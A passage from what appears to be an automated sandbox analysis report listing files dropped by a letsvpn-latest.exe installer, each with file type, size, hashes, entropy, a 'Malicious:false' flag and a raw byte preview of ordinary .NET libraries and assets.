                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.906430383476696
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:q16eWLDWZhqWOHlLf2KQcvBZ95BS+ShjmM6IGBkS2h:G6Lyq3b2KZBZ9S+ST6nkRh
                                                                                                                                                                                                  MD5:4A8B84A7EF10B13E81857BFB02708FC3
                                                                                                                                                                                                  SHA1:0E63EBD59F13A628584F2DA2D0DB501B23EF97D2
                                                                                                                                                                                                  SHA-256:048643B783A173AEF2AC52005CB27DC9F70AD38ECF6FABD8C1868317692CDE2D
                                                                                                                                                                                                  SHA-512:077EA9B6229F2809630135C624EB9CF303D5546A78C6A98111D3E3B8023EBCF5C559F05DEC196BA70004C26BBA826E417007ED368FE6845758210E440224C9FB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............*... ...@....... ..............................}.....@.................................|*..O....@.................. ....`......D)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..t....................(......................................BSJB............v4.0.30319......l.......#~......8...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................z.....z...u.g.................................>.....W.................r.....[...................a.....a.....a...).a...1.a...9.a...A.a...I.a...Q.a...Y.a...a.a...i.a...q.a.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.XDocument.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18464
                                                                                                                                                                                                  Entropy (8bit):6.896763555557214
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:O8G4YC2W+wW8WpwW1hqWOHlLf2KQcvBZ9PlfS+ShjmM6IGBkSvacr:BGZ5lq3b2KZBZbS+ST6nkyaS
                                                                                                                                                                                                  MD5:BE61E3A1BB22AB977E7DE6538695BEAA
                                                                                                                                                                                                  SHA1:5B9059D915EDDAD58A1054660AAF0A5CC238D65A
                                                                                                                                                                                                  SHA-256:42891D1D8BC5F5A30DB038BAD254938E660D57FA9AC0CB29ACF46B1E3B77AE3E
                                                                                                                                                                                                  SHA-512:D77E08BD7D639DFCE63528C855CA08B456A7180CFCB62E7D90131F9A65DBD24FB70853F05674FAF64E03FB2DB414C7F095AD83054D9E13BAE5021F7CEC21DF89
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............+... ...@....... ..............................R2....@.................................z+..O....@..x............... ....`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...x....@......................@..@.reloc.......`......................@..B.................+......H.......t ......................P*........................................s....*:.(......}....*2.{....(....*BSJB............v4.0.30319......l.......#~..0.......#Strings............#US.........#GUID...........#Blob...........WW.........3..............................................................L.........4.H...}.H...u.v...........;...........;...=.;.................../.%...........P.....m.....................................v...S.......v...d.v...........v...m...............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.998455717974313
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:H6ziqTEkGWvRWlhqWOHlLf2KQcvBZ9ypS+ShjmM6IGBkSN:HYT1Uq3b2KZBZqS+ST6nke
                                                                                                                                                                                                  MD5:4E6B8B111DEFA233D2371E499C205B11
                                                                                                                                                                                                  SHA1:83BA5DBBC30F3061DA4A5D8C48EB2600379DA7EF
                                                                                                                                                                                                  SHA-256:752FFB91E0F093EEDCC1FE30FDBDC8D638192D3ABD8A3593CA7E80DF5EACCD74
                                                                                                                                                                                                  SHA-512:1694C2E5C064F28D74CE3B4437F072FE856FD94C0FB2DBD5E5B084F3A50541A0B9C73B92EB8D0FB659019068B1E8D61B8907C537D4608EFD2F683087A8D862E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@.................. ....`......d(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3................................................'...........~...................................G.....`.................{.....d...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.-...K.M...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlDocument.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.914453258066552
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:PUv7c7iWNCWLhqWOHlLf2KQcvBZ91b/OS+ShjmM6IGBkSL:PM7c1Rq3b2KZBZ7OS+ST6nkg
                                                                                                                                                                                                  MD5:9D8D0EA2C78FD96A911BF3309BA106CA
                                                                                                                                                                                                  SHA1:77A5CF297E4A096E9D4D69397FD1CE740C983449
                                                                                                                                                                                                  SHA-256:1A1BCB4B7D3D9F6237BC0AD500F569C67A3814D752CAC05EA36D88DE364503F5
                                                                                                                                                                                                  SHA-512:1FC4B5A840C3550DCD9C164EC50229707B0C229573FFDE68B0C298F2F34D0F5567385FBA0C72BD062394F0E9B5B04D2DC2F75521B3FC14DD0A3D97F407428876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............*... ...@....... ....................................@..................................*..O....@.................. ....`......`)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~......l...#Strings....l.......#US.p.......#GUID...........#Blob......................3................................................4...........~.............H.....H.....H.....H...T.H...m.H.....H.....H.........d.H.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlSerializer.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.960387412382897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:bSWnRWNhqWOHlLf2KQcvBZ9w+Z1DcS+ShjmM6IGBkSZ:bzIq3b2KZBZNcS+ST6nkC
                                                                                                                                                                                                  MD5:C696F5E811F8F558D1B6330C03E8CC14
                                                                                                                                                                                                  SHA1:E54559000EBDEC51C7162C528487DA60B5AD3FEB
                                                                                                                                                                                                  SHA-256:373D38EA5B8D8A8D55390BB9813A7A72BF5B930A77319E1CA52A70ADC85CE25A
                                                                                                                                                                                                  SHA-512:DA33E7E6C193CA5689AFB28539671F9CE3B3C97A1227F8C3526A6A731CD0C6FBD700C90AA0A2DCF2BFD8263BF56BCEFB92F9238F98DBF38FD1206CEE04A559AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............+... ...@....... .............................. .....@.................................L+..O....@..$............... ....`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................+......H.......P ..D....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings.... .......#US.$.......#GUID...4.......#Blob......................3..................................................k.....k...U.@.........i.....=.........................................&.....'...................:.....:.....:...).:...1.:...9.:...A.:...I.:...Q.:...Y.:...a.:...i.:...q.:.......................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.Messages.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101920
                                                                                                                                                                                                  Entropy (8bit):4.745461540655048
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:iHmt9tmMLbLR6330XUb9GYQtq3b2KZBZmS+ST6nkM:i+d6336UbIL43qK4/mG
                                                                                                                                                                                                  MD5:F23E3999FCDB4144DAC81D4808D2B897
                                                                                                                                                                                                  SHA1:B6055D4DBC6EA3C380787BE1D76332A033F5CFA4
                                                                                                                                                                                                  SHA-256:94537ED511AB56D787064EFCA837CC05FB99B2192F127C35668061E4CD69A09A
                                                                                                                                                                                                  SHA-512:F2F4FADE96296AE065814FE80AF8FBE521E73C8AFC6986DA2EEC9A0FC35DD8704C13052DA7204110FD2F89EC746562C5EB7E752D5B238AEE21864601A9DF9659
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.........." ..0.............*.... ........... ....................................@.....................................O...................`.. ............................................................ ............... ..H............text...0.... ...................... ..`.rsrc..............................@..@.reloc...............^..............@..B........................H........(..."...........J..p... ........................................0.. .......s7......}........8...s....o...+*.0..'.......s9......}......}........:...s....o...+*..0.. .......s;......} .......<...s....o...+*.0..'.......s=......}!.....}".......>...s....o...+*..0.. .......s?......}#.......@...s....o...+*.0..'.......sA......}$.....}%.......B...s....o...+*..0.. .......sC......}&.......D...s....o...+*.0..'.......sE......}'.....}(.......F...s....o...+*R.(.....(......(...+*2.(.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):121376
                                                                                                                                                                                                  Entropy (8bit):5.089922899922607
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:or7hqeNzclb+af/wFGfdpOOJWOQE9/TBLW/Uwm0q3b2KZBZgS+ST6nk7:or7hqeNzclR/CWpKsRBLW/Ef3qKW/m9
                                                                                                                                                                                                  MD5:CA100065CAC383E78E4FAFC5610FA289
                                                                                                                                                                                                  SHA1:57AB1CF0E9FE01100DB886C2C639BE85CCA96679
                                                                                                                                                                                                  SHA-256:3F3E6F279A50164480B76A204969339069409AC164A1DCAA9329D552B92B288D
                                                                                                                                                                                                  SHA-512:E3C8ACE8EBCBA78335436451449F6CAD5895E82DEFD8C7B8AE26656C3A70AA2D76EA6AD81D3B816F00CC4D493B93DB7D943A43B504460A53EE3B3214FBD37C22
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.........." ..0..$...........C... ...`....... ....................... ............@..................................C..O....`.................. ...........hB............................................... ............... ..H............text....#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc..............................@..B.................C......H........N...n..................A......................................f.s....}.....(......}....*v.(.....{.....o.........o....*.0...........{..........(.....{....,..k.(......o....%-.&s.......}......o....}.....{.....o....o......o.....o.....o.....o.....s....}.......,..(.....*.........s|.......0..T.......s....%(....o....o......{.....o.....o....-.r...pr'..ps....z.o....-.re..pr'..ps....z.*J.{....%-.&*.o....*..{....*..0..M........{....-D..}.....{....%-.&+.(....%-.&+.o.....{....%-.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):130080
                                                                                                                                                                                                  Entropy (8bit):5.9702765639204065
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:/Ax1gFvyQ1P7QozISTBCW1Nt+Gi/yOWi1/Xg6iyhUkuXlf/m:/EwJjRB5z2
                                                                                                                                                                                                  MD5:0E444739D07678A3F6EA4202C4237832
                                                                                                                                                                                                  SHA1:0689C9CDAD379B4B0952674A7BF75A5A1F2F33A9
                                                                                                                                                                                                  SHA-256:A3AAB8CA7B0747242207D1223E241E602B45BA69F25BA5B611A12EEACD19EC1A
                                                                                                                                                                                                  SHA-512:85F6D4920D93F8EE2BB7A384424C9EEA25CC5591BF7A7301BDC31170944549B3860A90C5694F194EE0F9CD85F0EA053E89039F95FF806B735E526D583EE7E0BF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q............." ..0.................. ........... .......................@.......i....`.................................U...O.......\............... .... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc....... ......................@..B........................H...........8...........................................................0..........s......(8....j........(9...&...(.......0o.........+,.....o ...o!...o"...&...2..r...po"...&...Y...../..0...r...p(#.....(1....r5..po"...&...o$...o"...&...o$...*..........ag.0.....0..j.......~%....rQ..prY..ps&...%.o'...%.o(...%.o)...(*.....o+...o,.......,..o-........r_..p(#....(1...r...p.s....z.*........0..>..........DJ.......0..........s/....(......l...%....%....o0......+r.....(1...-b...l...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\View\Assets\notification_icon.png

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PNG image data, 256 x 256, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12243
                                                                                                                                                                                                  Entropy (8bit):7.820583648387655
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:WLj1H8FzmdclL4jx3c4yrJuhRof6YQURyMGf0gDSvGrEHsf8Aw47b:QpiYccZrZRof6YQUPPgDSvGr+q8D47b
                                                                                                                                                                                                  MD5:AA3CFA4A176584F79EEE7F74032E446F
                                                                                                                                                                                                  SHA1:752B97FF9A8D28E92F6FB35EE24FF3DA2E8DEEE5
                                                                                                                                                                                                  SHA-256:34A9425F58EDB250E7FBD9217D73A5AD96D1986ACA3520AFE8CADB66E32E3F33
                                                                                                                                                                                                  SHA-512:A824DA84DEDAFCDCEACDF9D602B5F89526168E6350E7478D31A5562A8B12D496FB5205B62EDFB2DF1C3896D6B24DA761A1211CF342C1AFF8E6235C4569A54BFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.PNG........IHDR.............k.XT....PLTE....g.H.\...O..E..E.jj..D..E.Q..rb.S...D.tc..H.H.P..ni.T..S...H.Q...F.N..L.N...E.....D.M..Y..yS.uW.O..S..ig.q[..D..H....}P.lc..D.T..bv.en.gk.n_.Q..]...L..D.D.D.D.[...N..D.F.[..cr..D.V...E.D.D.Y...D..D.P.._}..L..D..C..D..D.D.W...D.G.I..D.`z..D..D..E.D.m...D..D..C..G.o...C..N..O.w{.t...[.j..]...R.q..c...U..Q..N..i..Y..`..S..N.zw..n..N.g...N..N.|r..N.N.....V..N..N....^..a..d...N.g......N.N.O..N.M.O.O.d..O.......U...N....z?.LN.n>....O..w..kb...eP.`2.`D.sq..*.....*..7.....W.w^.T=...sJ....f..xj....bk..$.....&.[[..&....g$.....u...m.....B......Vj..8.I....'.mx......1.k..Oy.........j.... .:..Fb..1....\.....@u.. .....H.L...f.-.........I.t".......g..1....G...(.E..........8..w...y....9..I.....i..............k......}...b..E.....tRNS..*-.L...O...QQ..........'^..,iIDATx...MH.A.....].U3.Xw....B.*2..K...A..i.%F...BWA..3.K..H...u.P...C..I..K..<...w....C_........>.../...+**+..v.@m..N.X.XG.qt.i.k+...(jX*Q

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):73760
                                                                                                                                                                                                  Entropy (8bit):6.270537704846323
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:DXSaVnItYw1N0tUUTAz/kI5JIol/NkIgJ4Wj3qKK/mS:D5VnqzNaNE4IvIolSIgJjje/9
                                                                                                                                                                                                  MD5:A0442D522D6D577EB8727E1F1019413B
                                                                                                                                                                                                  SHA1:D39D4879650B86A7B9EEFD44418236432E84AAA3
                                                                                                                                                                                                  SHA-256:B4876C4E26053DDC8E3D198C20E2EB0A45D4B0A935AB7493CC7C5B41F93FAE67
                                                                                                                                                                                                  SHA-512:9C024876A876FE3B9F708EB9B3F6BAA3BBD3984542CD8F6DFFB16BEF693E40754371D5FA780EF204DDD09B37D2C1C0B68C18AB6D93CF969732F9CBD046A27CA9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*FqZ.........." ..0.............V.... ... ....... .......................`............`.....................................O.... ..4............... ....@....................................................... ............... ..H............text...\.... ...................... ..`.rsrc...4.... ......................@..@.reloc.......@......................@..B................6.......H.......4k...............................................................{....*"..}....*..{....*"..}....*V.(......(......(....*:.(......(....*..{....*"..}....*Z...o....&.~....o....&*Z...o....&.~....o....&*V..o....&.~....o....&*6.~....o....&*...0...........~....Q..~......s.....8.....P(....,...Q8.....r...po....,..(....-&....o....-..*.....o....( ...o!...8......:o"........?........o#.......(....-...o..........Xo$.......(....-"..r...po....,...o%....1....o$.......(....-1.....o....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\WpfAnimatedGif.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54304
                                                                                                                                                                                                  Entropy (8bit):6.372264039844505
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:hDcl7W1UiZTo1ooEqzW3SQwiNsI8l5wwyvUPrYZBkcDTq3b2KZBZuS+ST6nkW:h8QpZTsooEX3SQwr9y4UZRDu3qKA/m0
                                                                                                                                                                                                  MD5:1CE428CFF43522A1AF4FACB23F71D608
                                                                                                                                                                                                  SHA1:C8F354FBDFB68B356CB4146A1EE945A2375FBAD5
                                                                                                                                                                                                  SHA-256:2956DDEB4C4D1284C52A099305DA39243888F9DAD5A15284C89A2D2238E07107
                                                                                                                                                                                                  SHA-512:06CFA947BB50B6E5A346ED6B390DEC8A0004B282A306B9F8F3CA69EF4587AAFEDC42536C12308BDFF57261F586C9481C7C3961188AAE4BE5C19C4CF7102CDDB7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.................. ........... ..............................tB....@.................................J...O.......$............... ...........h...T............................................ ............... ..H............text........ ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B................~.......H........H..Hq...........................................................{....*..{....*V.(......}......}....*...0..;........u......,/(.....{.....{....o....,.(.....{.....{....o....*.*. ...' )UU.Z(.....{....o....X )UU.Z(.....{....o....X*.0...........r...p......%..{.....................-.q.............-.&.+.......o ....%..{.....................-.q.............-.&.+.......o ....(!...*.0..2..........(....~.......o"...-.~.....s#...%.o$.....o%...&*...0..A..........(....~.......o"..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\arm64\WebView2Loader.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) Aarch64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):127008
                                                                                                                                                                                                  Entropy (8bit):6.1002030171865975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:7DdMkQCUK86ryzDWs0MxThVvTe6sWkddGDGEtg3q2LOOCN+y3qKI/m2T:7Ddef+yR17exwDGEtg3q2LOdN+yU/lT
                                                                                                                                                                                                  MD5:549B6EC92306E2450F143AA585DF6DB2
                                                                                                                                                                                                  SHA1:E3AC456C76C4977E9C33A69DD649F13628C10686
                                                                                                                                                                                                  SHA-256:9C5602FEABC5C7C4D96551400282CAE11E740D87141476DCE5C7B5060EF5AEA0
                                                                                                                                                                                                  SHA-512:3ECA35112F57FC3DCDD25CD554A7E8F53F01DED73241027CD5C6C2EA57EE1B061C2D7DCE8B33716A615C2233B8C268712125FDFD0F800E42FCA8EE872495A04C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......`.........." ................ C....................................... ......rS....`A........................................_.......Q...(...............(....... .......|..........................@...(... !..0...................P........................text............................... ..`.rdata...... ......................@..@.data...|...........................@....pdata..(...........................@..@.00cfg..............................@..@.tls................................@....rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\cs\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.786293052327813
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:JEZLkwA5qKV3XWe6lW1hqWOHlLf2KQcvBZ9YsTS+ShjmM6IGBkSS:yxkwAlaQq3b2KZBZtTS+ST6nkJ
                                                                                                                                                                                                  MD5:489C8B9F4E37E1D1FEF662341FC3F95A
                                                                                                                                                                                                  SHA1:3AE58E1054B8D994F1E2D26402BA285F16257116
                                                                                                                                                                                                  SHA-256:30290D2070FB124A2BD8DB48B11CFBEA21B0AFD5BDC28F3401FEDD8C3F9B66A8
                                                                                                                                                                                                  SHA-512:7D6C7A93ED7CE939DFF8BEBB5FD5F5687E8A877A7019ACEF0E4F2797001657561CB55B834BE9BCFE2DED8FA23F8CA5C8C96EFAD6EE71D1E6AB5800E82ACC529A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............8... ...@....... ....................................@.................................D8..O....@...............$.. ....`......(8............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................x8......H.......P ...............%.......7......................................BSJB............v4.0.30319......l...D...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\de\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.788421298560347
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4qmGsHW08We6lWMhqWOHlLf2KQcvBZ9DjqgS+ShjmM6IGBkSZRI:4BGsH1xHq3b2KZBZFlS+ST6nkGI
                                                                                                                                                                                                  MD5:D8C061C0526368E2A9D9B90BAE61E764
                                                                                                                                                                                                  SHA1:E83C1F781F339BC06A3FE0E27701869EE79B177C
                                                                                                                                                                                                  SHA-256:39D5F8E342DB9B9A694944D03099EB2C6CCAE1F926D829858D216985A54066F7
                                                                                                                                                                                                  SHA-512:D15944E01ADEFACCED782C9BA76851EE025A93AD6D5FE52392834A9D88AEDABBA39BE3B83B75A37C3D52B4DA67B83961237486300A9B8DC97605CAEACA055D3A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G),..........." ..0..............9... ...@....... ....................................@..................................9..O....@...............$.. ....`.......9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%..8....9......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3....................................../.......................u...........].....].....]...D.]...a.].....]...-.].................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\es\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.754267815741174
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:611LpDt4We6lWHhqWOHlLf2KQcvBZ9AE9S+ShjmM6IGBkSZ:iBdqq3b2KZBZB9S+ST6nkK
                                                                                                                                                                                                  MD5:335DDC15C604733F3A3A74150F7EE386
                                                                                                                                                                                                  SHA1:017B875AD2AF40A2245DA464A34572509007D6CB
                                                                                                                                                                                                  SHA-256:514D89ED6AC01AE7B71A64C36B0A40FEC69973F5E0D4BB42DA8CF2DBA9278E0F
                                                                                                                                                                                                  SHA-512:208135523870EDC892F236B20C8C1B49E2922C888C6BC9403CC29F7BFF6A94FB41D69AFCD427A102E9016B032DC56424EFE4BC458974058ACF47398DA2BA939D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k2............" ..0.............69... ...@....... ..............................S.....@..................................8..O....@...............$.. ....`.......8............................................... ............... ..H............text...<.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%..x...H8......................................BSJB............v4.0.30319......l...D...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\fr\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
